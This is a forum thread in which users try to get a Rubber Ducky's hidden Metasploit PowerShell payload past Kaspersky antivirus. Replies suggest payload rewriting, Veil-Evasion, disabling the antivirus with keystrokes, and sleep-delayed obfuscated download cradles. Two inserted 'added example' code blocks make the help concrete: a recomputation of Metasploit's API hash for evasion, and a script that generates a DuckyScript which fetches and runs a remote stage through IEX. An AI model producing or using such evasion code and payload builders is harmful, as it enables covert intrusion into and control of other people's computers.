nullcult Posted July 13, 2016
Hi guys, I've tried to get past Kaspersky using my Rubber Ducky, but all in vain. Immediately after the Ducky writes out the payload I get an access denied, and then Kaspersky pops up stating malicious activity. How can I get past this? Below is the script I used.

DELAY 5000
GUI r
DELAY 1000
STRING cmd
ENTER
DELAY 1000
STRING powershell -nop -win hidden -noni -enc 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
ENTER
axion Posted July 13, 2016
Is the code that PowerShell is executing related to Metasploit?
nullcult (Author) Posted July 13, 2016
1 minute ago, axion said:
Is the code that PowerShell is executing related to Metasploit?
Yes, it's a Metasploit payload.
axion Posted July 13, 2016
Kaspersky uses sandboxing to determine if a program is harmful. It executes the code in a controlled environment to test it before it really executes the program on the normal system. I believe (though I don't really know for sure) that it's looking for a pattern of calls to certain functions, which is why it's getting detected. You might need to rewrite the payload somehow, but that could be very hard to do; I'm not sure.
nullcult (Author) Posted July 13, 2016
3 hours ago, axion said:
Kaspersky uses sandboxing to determine if a program is harmful. It executes the code in a controlled environment to test it before it really executes the program on the normal system. I believe (though I don't really know for sure) that it's looking for a pattern of calls to certain functions, which is why it's getting detected. You might need to rewrite the payload somehow, but that could be very hard to do; I'm not sure.
But it's alphanumeric shellcode that I thought runs in memory without touching disk! You recommended rewriting the payload; do you have any references? Thanks.
axion Posted July 13, 2016
1 hour ago, nullcult said:
But it's alphanumeric shellcode that I thought runs in memory without touching disk!
Because Kaspersky is blocking it, I'm guessing it's able to test powershell.exe being executed with the shellcode, or maybe it works by analyzing the process while it's running in memory.
1 hour ago, nullcult said:
You recommended rewriting the payload; do you have any references?
I have no real idea how you would do this effectively; maybe ask Google?
Guest Posted July 15, 2016
Maybe this is too far-fetched (I think axion is right and you need to review your code), but... maybe it's worth giving it a try and using the Ducky to shut down Kaspersky first? After all, they're just keystrokes. Open the Start menu, open the Kaspersky console, etc.
Guest Posted July 15, 2016
Also, if this message you get from Kaspersky says "suspicious activity detected", is there a button or option to allow it? Can't you use the DuckyScript to choose that option? Just an idea...
datajumper Posted July 17, 2016
Have you tried using Veil-Evasion.py, then using the Ducky to run it? Use something like Ruby or Python shellcode; it wigs some antiviruses out in some of the exploits I have tried. Let me know what you think. The shellcode method can be awesome at times. I would try Veil-Evasion first; if that doesn't work (which it should), try a few of them, like python rev_tcp with the PyInstaller option or the obfuscating option. Ruby always works for me; Avast doesn't see it. I've not tried Kaspersky, but it should get around it. Try Veil and let me know how it worked for you. Cheers!
datajumper Posted July 17, 2016
But I do like the idea of not touching the hard disk; that's awesome, less chance of you getting caught. If you are going to use the shellcode method, try using the Venom shellcode generator; it works a lot like Veil-Evasion.
https://sourceforge.net/p/crisp-shellcode-generator/shell/ci/master/tree/
https://sourceforge.net/p/crisp-shellcode-generator/wiki/Home/
fugu Posted July 20, 2016
This is untested, but I rewrote the hashing that your exploit is using. Instead of the ror13 hash that was being used, I changed it to ror12. On VirusTotal now, Kaspersky is unable to detect it, but it could be because I created a bug that I don't know about in the process; like I said, I haven't tested it.

DELAY 5000
GUI r
DELAY 1000
STRING cmd
ENTER
DELAY 1000
STRING powershell -nop -win hidden -noni -enc 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
ENTER
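To see what the ror13-to-ror12 change in the post above actually touches, here is an added example (my code, not fugu's or the thread's) that reimplements the API hash used by Metasploit's x86 block_api resolver, as computed by hash.py in Metasploit's shellcode sources: the module name is uppercased and hashed as UTF-16LE including its terminator, the export name as ASCII including its terminator, and the two are summed modulo 2^32. With the stock rotation of 13 it reproduces the constants pushed by the stagers (0x0726774C for kernel32.dll!LoadLibraryA); with bits=12 it gives the values a ror12 variant must push instead. The assumption the block makes is only that the resolver stub in the shellcode rotates by the same count as the hashes it compares against, which is why a rotation change has to be applied in both places or no import resolves.

```python
"""ROR-based API hash as used by Metasploit's x86 block_api (added example)."""


def ror(value: int, bits: int) -> int:
    """32-bit rotate right, matching `ror edi, <bits>` in the resolver stub."""
    value &= 0xFFFFFFFF
    return ((value >> bits) | (value << (32 - bits))) & 0xFFFFFFFF


def _hash_bytes(data: bytes, bits: int) -> int:
    # Per byte: rotate the running hash, then add the byte (rotate-before-add).
    h = 0
    for b in data:
        h = (ror(h, bits) + b) & 0xFFFFFFFF
    return h


def module_hash(module: str, bits: int = 13) -> int:
    """Hash of the module as the resolver sees it: uppercased BaseDllName,
    UTF-16LE, including the two-byte NUL terminator."""
    return _hash_bytes((module.upper() + "\x00").encode("utf-16-le"), bits)


def function_hash(function: str, bits: int = 13) -> int:
    """Hash of the export name from the export table: ASCII plus NUL."""
    return _hash_bytes((function + "\x00").encode("ascii"), bits)


def api_hash(module: str, function: str, bits: int = 13) -> int:
    """The 32-bit constant the stager pushes before calling api_call."""
    return (module_hash(module, bits) + function_hash(function, bits)) & 0xFFFFFFFF


if __name__ == "__main__":
    for mod, fn in [("kernel32.dll", "LoadLibraryA"),
                    ("kernel32.dll", "ExitProcess"),
                    ("kernel32.dll", "VirtualAlloc")]:
        print(f"ror13 0x{api_hash(mod, fn):08X}  "
              f"ror12 0x{api_hash(mod, fn, bits=12):08X}  {mod}!{fn}")
```

Run it and compare the ror13 column against the `push` immediates in a disassembly of the original stager; every one of those immediates, plus the single `ror edi, 13` in the resolver, is what has to change together for the ror12 version to work.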
Source_Writer Posted August 10, 2016
Any recent feedback about that problem?
datajumper Posted June 18, 2017
On 7/20/2016 at 5:12 PM, fugu said:
This is untested, but I rewrote the hashing that your exploit is using. Instead of the ror13 hash that was being used, I changed it to ror12. On VirusTotal now, Kaspersky is unable to detect it, but it could be because I created a bug that I don't know about in the process; like I said, I haven't tested it.

DELAY 5000
GUI r
DELAY 1000
STRING cmd
ENTER
DELAY 1000
STRING powershell -nop -win hidden -noni -enc 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
ENTER

After "STRING powershell -nop -win hidden -noni -enc" you then add the shellcode... Can that be converted to Digispark, like using the Duckuino converter? I'm having problems adding my shellcode due to lack of space on the Digispark. Are there any examples you can give me? I just need a small reverse_tcp script to run on the Digispark. Would you care to help me? Some guys on here gave me a few examples, but when I use msfvenom to generate the shellcode it's way too big. I need help either to make it smaller or another method altogether. And please keep in mind, even though I've been using Metasploit for a while, I'm still a noob with all of this Rubber Ducky and Digispark programming stuff... a copy-and-paste example would be nice, lol. The saying goes bigger is always better, lol; not in this case, I need smaller.
PoSHMagiC0de Posted June 19, 2017
Ohh, this one is going to be tough. Don't use shellcode. Instead, you will need to use Metasploit's web delivery handler. From that you just write a download cradle for the Metasploit script you are downloading and execute it. Now you can modify the cradle to have a sleep if you like before running the real code. Kaspersky will only watch it for so long. To make it not look suspicious, have it do a gci of c:\ to null and maybe write some text to null before sleeping. You may even have to obfuscate the downloader and executor part as a base64 string you can decode and execute to further obfuscate, maybe even dirty it up, if you are using the WebClient for PS 2.0 compatibility. I notice the newer Invoke-WebRequest doesn't seem to fire alarms. You could use PowerSploit's Out-EncryptedScript script to create a function with encryption to encrypt, but do the random junk and sleep before running it to fire off the downloader. You may be able to even try your shellcode with the encrypted script, with the random junk and sleep before unscrambling and firing it all off. Avast does something similar when I have compiled .NET EXEs with obfuscated PowerShell code inside. I think most likely it might be that you have shellcode inside a PowerShell encoded command that is easily seen. It is not running in memory when it is right there in the code and being executed. The memory part is after it is running; then it can download and run directly from memory. At the beginning you are still firing off powershell.exe from disk with parameters. The web delivery handler and the built-in command it gives you may do it for you without all the above, now that I think of it. Choose encoded to be sure. If not, some of the above may help.
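An added example (my code, not any poster's) that ties together the three practical points in this thread: the `-enc` blob typed by the first post's script is nothing more than base64 of the UTF-16LE script, so whatever is inside it (shellcode or cradle) is "easily seen" by anyone who decodes it, exactly as the reply above says; a first stage that is a short download cradle with a sleep and some harmless activity up front is far smaller than an embedded shellcode blob, which is the Digispark space problem raised earlier; and the number that decides whether it fits is the length of the longest STRING line. The cradle text, the 90-second sleep and the listener URL http://192.0.2.10:8080/stage (a TEST-NET address) are constructed for the example; the encoding is what `powershell -EncodedCommand` actually expects, and Invoke-WebRequest needs PowerShell 3.0 or later.

```python
"""Build the `-enc` argument and the DuckyScript that types it (added example)."""
import base64

# Constructed first stage: sleep and do something boring before the download,
# as suggested in the thread. The URL is a hypothetical listener (TEST-NET).
CRADLE = (
    "Start-Sleep -Seconds 90; "
    "Get-ChildItem C:\\ | Out-Null; "
    "IEX (Invoke-WebRequest -UseBasicParsing 'http://192.0.2.10:8080/stage').Content"
)

RUN_PREFIX = "STRING powershell -nop -win hidden -noni -enc "


def encode_command(script: str) -> str:
    """powershell -EncodedCommand takes base64 of the script as UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_command(blob: str) -> str:
    """The reverse step: what a defender or an AV engine sees after decoding."""
    return base64.b64decode(blob).decode("utf-16-le")


def ducky_script(script: str, boot_delay_ms: int = 5000) -> str:
    """Emit the Run-dialog DuckyScript from the first post around the blob."""
    lines = [
        f"DELAY {boot_delay_ms}",
        "GUI r",
        "DELAY 1000",
        "STRING cmd",
        "ENTER",
        "DELAY 1000",
        RUN_PREFIX + encode_command(script),
        "ENTER",
    ]
    return "\n".join(lines) + "\n"


def longest_string_line(ducky: str) -> int:
    """Length of the longest STRING line: the figure that has to fit the board."""
    return max(len(line) for line in ducky.splitlines() if line.startswith("STRING "))


if __name__ == "__main__":
    script = ducky_script(CRADLE)
    print(script)
    print("longest STRING line:", longest_string_line(script), "characters")
    # Decode the blob back out to show there is no hiding in -enc.
    blob = script.splitlines()[6][len(RUN_PREFIX):]
    print("decoded:", decode_command(blob))
```

The STRING line is about four times the length of the cradle in characters (two UTF-16 bytes per character, then 4/3 base64 expansion), which is why a cradle of one line fits where a few hundred bytes of shellcode encoded the same way does not, and why decoding the blob is the first thing a sandbox does.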